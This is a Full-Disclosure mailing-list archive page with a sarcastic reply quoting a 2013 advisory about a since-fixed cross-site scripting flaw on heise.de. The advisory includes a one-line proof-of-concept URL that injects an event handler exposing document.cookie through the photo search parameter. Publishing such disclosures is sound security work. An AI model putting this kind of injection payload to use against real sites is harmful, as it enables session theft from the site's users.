[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-disclosure] http://www.heise.de - Cross-site Scripting vulnerability
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: Re: [Full-disclosure] http://www.heise.de - Cross-site Scripting vulnerability
- From: osaft <osaft@xxxxxxxxxxx>
- Date: Sat, 12 Jan 2013 12:07:52 +0100
On Thu, 10 Jan 2013 19:47:25 +0100
Stefan Schurtz <sschurtz@xxxxxxxxxxx> wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Advisory: heise.de - Cross-site Scripting vulnerability
> Advisory ID: SSCHADV2013-002
> Author: Stefan Schurtz
> Affected Software: Successfully tested on heise.de
> Vendor URL: http://www.heise.de
> Vendor Status: fixed
>
> ==========================
> Vulnerability Description
> ==========================
>
> http://www.heise.de is prone to a XSS vulnerability
>
> ==========================
> PoC-Exploit
> ==========================
>
> http://www.heise.de/foto/galerie/suche/photo/?suchwort=";
> onMouseMove=alert(document.cookie) '
>
> ==========================
> Solution
> ==========================
>
> fixed
>
> ==========================
> Disclosure Timeline
> ==========================
>
> 03-Jan-2013 - informed heise Security
> 04-Jan-2012 - fixed by developer
>
> ==========================
> Credits
> ==========================
>
> Vulnerability found and advisory written by Stefan Schurtz.
>
Now thats valeable information. Thank god that you informed about this
groundbreaking issue, Stefan. I will update my personal heise.de right
away.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/